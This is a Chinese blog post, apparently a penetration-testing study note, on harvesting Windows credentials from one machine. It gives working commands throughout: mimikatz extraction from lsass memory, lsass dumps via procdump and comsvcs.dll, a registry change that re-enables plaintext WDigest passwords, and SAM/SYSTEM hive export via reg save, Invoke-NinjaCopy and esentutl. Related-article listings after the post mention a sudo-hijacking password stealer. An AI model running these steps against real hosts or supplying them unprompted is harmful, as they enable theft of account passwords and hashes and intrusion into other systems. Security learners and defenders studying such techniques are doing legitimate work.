凭据获取——windows单机凭据获取

已于 2024-07-31 21:00:16 修改
阅读量1.1k 收藏 11
点赞数 21
分类专栏: 内网渗透 文章标签: 网络安全
于 2024-07-14 20:00:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140419202
版权

文章目录

在windows中,SAM文件是windows用户的账户数据库,位于系统的%SystemRoot%\System\Config目录中,所有本地用户的用户名、密码hash等信息都存储在这个文件中。用户输入密码登录时,用户输入的明文密码会被转化为hash,然后再与SAM文件中的hash值对比,若相同,则认证成功。lsass.exe是windows的一个系统进程,用于实现系统的安全机制,主要用于本地安全和登录策略。在通常情况下,用户输入密码登录后,登录的域名、用户名和登录凭据等信息会存储在lsass.exe的进程空间中,用户的明文密码经过WDigestTspkg模块调用后,会对其使用可逆的算法进行加密并存储在内存中。

用来获取主机的用户密码和hash的工作大多通过读取SAM文件或者访问lsass.exe进程的内存数据等操作来实现。这些操作大多需要管理员权限

windows的登陆机制为单点登录,用户只需要输入一次密码,就可以使用所有需要身份验证的程序。具体来说,用户第一次凭据验证通过后,windows会将凭据放在lsass.exe(本地安全验证)进程的内存中,随后当其他进程需要验证用户身份时,该进程会帮助用户完成认证。

一、在线读取lsass进程内存

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
# privilege::debug:提升至Debugprivlege权限
# sekurlsa::logonpasswords full:从lsass.exe中提取凭证

在这里插入图片描述

如果出现以下错误,需要用管理员身份打开cmd命令行。
在这里插入图片描述

如果目标机器安装了KB2871997补丁,该补丁禁止WDigest在内存中存储明文密码。

# 查询UseLogonCredential的值,为1代表系统记录明文密码;为0代表不几流明文密码
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

# 开启密码记录功能,开启之后
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

二、离线读取lsass.exe进程内存

除了在线读取外,还可以直接将lsass.exe的进程内存转存,将内存文件导出到本地后,使用mimikatz.exe进行离线读取。

2.1 直接在进程管理器中生成指定程序的转储文件

在这里插入图片描述

在这里插入图片描述

使用mimikatz.exe解密转储文件

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" exit
# sekurlsa::minidump lsass.dump:加载转储文件
# sekurlsa::logonpasswords full:导出用户凭证

在这里插入图片描述

2.2 ProcDump转储

这里使用procdump实现离线转存。

procdump.exe -accepteula -ma lsass.exe lsass.dmp # 将lsass.exe进程转存
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" exit
# sekurlsa::minidump lsass.dump:加载转储文件
# sekurlsa::logonpasswords full:导出用户凭证

在这里插入图片描述

在这里插入图片描述

2.3 使用Comsvcs.dll获取转储文件

Comsvcs.dll是windows自带的DLL文件,它包含一个名为MiniDump的函数,而该函数在底层调用了MiniDumpWriteDump接口,该接口可以创建指定进程的转储文件。

1、转储时需要指定Lsass进程的PID,执行下面的命令获取lsass.exe进程的PID。

tasklist | findstr /i lsass

在这里插入图片描述
2、需要保证当前会话已经启用SeDebugPrivilege特权,cmd本身会禁用该特权,powershell默认开启。

# 判断cmd是否开启
whoami /priv | findstr SeDebugPrivilege

# 判断powershell是否开启
powershell whoami /priv | findstr SeDebugPrivilege

在这里插入图片描述
3、生成lsass进程的转储文件

powershell rundll32.exe comsvcs.dll,MiniDump 484 C:\lsass.dmp full

在这里插入图片描述

三、在线读取本地SAM文件

SAM文件中所保存的用户凭据并非明文存储,而是通过SysKey(SAM锁定工具)加密。使用下面的命令读取SAM文件中保存的用户hash凭证,注意是当前系统中本地用户的hash

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
# privilege::debug:提升至SeDebugprivlege权限
# token::elevate:提升到system权限
# lsadump::sam:读取本地sam文件,并使用SysKey进行解密

在这里插入图片描述

四、离线读取本地SAM文件

离线读取就是将SAM文件导出,使用mimikatz加载并读取其中用户的登录凭证等信息。注意:为了提高SAM文件的安全性以防止被离线破解,windows会对SAM文件使用密钥进行加密,这个密钥存储在SYSTEM文件中,与SAM文件在同一目录下。

4.1 利用powershell获取sam文件

通过Invoke-NinjaCopy.psl脚本实现
在目标主机上导出SAM和SYSTEM文件,因为系统在运行时,这两个文件被锁定,可以使用PowerSploit项目中的Invoke-NinjaCopy.psl脚本实现。

管理员身份启动powershell,在域环境中需要域管理员密码才能启动。

Import-Module .\Invoke-NinjaCopy.psl
Invoke-NinjaCopy -Path "C:\Windows\System32\config\sam" -LocalDestination C:\Temp\SAM
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination C:\Temp\SYSTEM

在这里插入图片描述

出现以下错误,运行Set-ExecutionPolicy Unrestricted -Scope CurrrentUser
在这里插入图片描述

# 使用mimikatz加载并读取SAM中的用户凭证信息
mimikatz.exe "lsadump::sam /sam:C:\SAM /system:C:\SYSTEM" exit

在这里插入图片描述

4.2 利用注册表获取sam文件

需要管理员权限

# 使用管理员权限,通过保存注册表的方式导出
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# 使用mimikatz加载并读取SAM中的用户凭证
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" exit

# 或者用kali自带samdumpe进行解密
samdump2 system.hive sam.hive

在这里插入图片描述

4.3 利用Esentutl获取sam文件

版本要求:windows 10、windows server 2016及以上版本
esentutl.exe是windows自带的命令行程序,专门用来做数据库维护以及进行数据库恢复操作。

# 导出SAM文件和SYSTEM文件
esentutl.exe /y /vss C:\Windows\System32\config\System /d system
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d sam

# 导入mimikatz
sadump::sam /sam:sam /system:system

没装Win 10虚拟机,没敢在自己电脑试~

PT_silver
关注
专栏目录
域内凭据窃取
G3et的博客
05-27 211
使用procdump获取密码副本,采用此方式可以解决mimikatz无法使用的问题,导出的dmp文件可在其他主机进行还原密码。本地认证中用来处理用户输入密码的进程为lsass.exe,密码会在这个进程中明文保存,供该进程将密码计算成NTLM Hash与sam进行比对。需要注意,windows server 2008及以前的版本在系统中存储的是明文密码,而在之后的版本默认导出的密码均为NTLM hash。转储了lsass进程,把内存dump出来的dmp文件可以通过本地mimikatz进行解密。
C#文件操作从入门到精通(1)——INI文件操作
qq_34059233的博客
07-30 2433
本文详细介绍ini文件在winform中的应用,纯属项目实战经验!
安全帐号管理器SAM文件基础知识
weixin_34232744的博客
06-19 468
Windows NT及Windows2000中对用户帐户的安全管理使用了安全帐号管理器(security account manager)的机制,安全帐号管理器对帐号的管理是通过安全标识进行的,安全标识在帐号创建时就同时创建,一旦帐号被删除,安全标识也同时被删除。安全标识是唯一的,即使是相同的用户名,在每次创建时获得的安全标识都时完全不同的。因此,一旦某个帐号被删除,它的安全...
windows查看凭证
空白画布
05-10 1420
请注意,具体步骤可能会根据Windows版本和安装的应用程序有所不同。如果你需要具体的代码示例,请提供更多的上下文信息,例如你正在使用的操作系统版本、需要查看凭证的具体类型等。在Windows中查看凭证通常指的是查看保存的登录信息,如网络凭证、账户密码等。这些信息可能被保存在不同的地方,如Windows凭证管理器、控制面板或者是浏览器的保存数据中。
Windows密码凭证获取
weixin_51151498的博客
06-28 521
密码凭证获取
Linux系统下利用Impost3r劫持sudo命令窃取凭据
weixin_60274950的博客
07-01 1135
Impost3r是一款针对Linux平台的密码窃取工具,该工具采可以在linux系统的普通用户权限下制造水坑,从目标Linux主机中获取各类密码如ssh、su、sudo等。 软件使用 C 语言编写,可以在窃取密码后自动保存清理窃取痕迹,最大程度上让被攻击者无法察觉异常。...
一份完整的单机版slurm部署
没有记录就没有发生
12-17 2733
截图上传有问题,如果部署过程有问题可以发私信我,也可以TD2021JY 场景使用:一台8卡gpu服务器,想要多人使用,每次提交任务可以使用一块卡【也可以使用两块,具体需要配置】,比如第9个人使用时就要排队,等前面8个人用完才可以使用gpu做计算,基于这样的一个情况,我研究了下slurm,花了两天时间终于实现了我需要的功能,以下是我所有的部署操作,一份很完整的单机slurm部署文档。 一、准备工作 关闭防火墙、禁用selinux 机器为两颗cpu,单颗16核心,8块RTX6000显卡
计算机网络原理学习资源——局域网设计
qq_43386985的博客
12-10 1862
一、局域网设计背景 有相邻的三个宿舍201、202、203(相距在50米距离之内),共15台PC机(201有4台,202有6台,203有5台),现要组建成一个局域网,实现三个宿舍计算机资源共享,并设计接入国际互联网方式,要求组网经济实惠。 二、网络连接图 三、设备清单(设备或材料名称、数量、单价、总价) 四、网络的功能及实现说明 1. 局域网的功能: (1) 共享文件单机运行的状态下,各台...
五分钟学后端技术:如何学习分布式系统和相关技术
Java技术江湖
03-29 1191
转载自https://www.cnblogs.com/wetest/p/6806506.html 和https://www.cnblogs.com/dudu0614/p/8821811.html 什么是分布式系统 分布式这一概念,一直都是后端工程师绕不过去的一个坎,今天,我们就一起来看看到底什么是分布式系统,又有哪些分布式技术世我们需要学习的。 根据百度百科的介绍,分布式系统(distribut...
lsass进程不断上传流量的处理方法
08-08
简单好用的,lsass进程不断上传流量的处理方法,lsass进程不断上传流量的处理方法,
lsass.exe占用CPU50%以上解决方法
08-28
解决lsass.exe占用CPU50%以上。解决lsass.exe占用CPU50%以上。
提取正在运行的系统的SAM文件教程
05-01
天教大家如何将当前正在运行的系统的SAM文件拷贝出来。 SAM有何用?SAM文件就是当前用的帐号密码保存的文件,直接复制是复制不出来的,被系统锁定了。当然我们有办法将它复制出来。 所需工具有:WinHEX11.2 版本。 这个工具我会打包到教程里,方便大家。 接下来看演示。 SAM文件和SYSTEM文件就保存在这里。 C:\WINDOWS\system32\config 瞧,直接复制是不行的! 接下来打开WinHex软件 选择磁盘编辑,打开你的系统盘,一般是C盘 然后通过文件列表找到刚才的C:\WINDOWS\system32\config 找到后就可以复制出来了,看演示 瞧,成功复制出来。 理论上上通过这样的方法可以复制任何你想复制出来的文件。 本方法还可用于非admin权限。也就是说,如果你是User权限也可以复制出来。 方法很简单,就是看你想的到想不到了。 教程就到这里吧,希望对大家有用。 顺便说下,破解SAM密码,用彩虹表方法可以很快的破解。大家可以百度“彩虹表破解”
SAM文件取hash值
10-19
取出windowsSAM,破解然后跑出用户名。密码。好用好玩,别用与干坏事呀!!!!
常用工具列表清单及常用系统介绍
holmeswf的博客
05-08 1996
常用工具列表清单 一、ViewMate, GIMP, Kleopatra, VMwareVsphere, Sourceinsight, GNU Octave, Adobe Audiotion
windows本地凭据获取
最新发布
weixin_44268185的博客
08-20 144
【代码】windows本地凭据获取
凭证窃取的几种方式
Wawyw's Blog
07-19 1187
0x01 Windows登录凭证窃取 Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。它们都是用户密码经过hash加密后的形式。 Windows系统下hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值。 例如: Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040 用户名称为:Administrato
使用Python获取指定Windows凭证账户密码
weixin_44474268的博客
05-13 1674
import keyring import win32cred def get_cred(): array = [] with open('D:\\UiPath\\凭据地址.txt', 'r', encoding='utf-8') as f: for line in f.readlines(): line = line.strip() a = win32cred.CredRead(line, 1)["UserName"] .
使用 kinit 命令重新获取 Kerberos 凭据
06-09
Kerberos 是一种网络身份验证协议,它需要用户在进行某些操作之前获取凭证。如果您在 Hadoop 集群上遇到了身份验证问题,可以尝试使用 kinit 命令重新获取凭证。以下是使用 kinit 命令重新获取 Kerberos 凭证的步骤: 1. 打开终端并登录到 Hadoop 集群的一个节点上。 2. 运行以下命令来获取 Kerberos 凭证: ``` kinit <username> ``` 其中,`<username>` 是您在 Hadoop 集群上的用户名。 3. 输入您的密码以确认身份验证。 4. 您现在应该已经获取了 Kerberos 凭证。您可以使用 `klist` 命令来查看当前有效的凭证。 ``` klist ``` 如果您看到了有效的 Kerberos 凭证,则可以尝试重新执行您之前遇到身份验证问题的操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值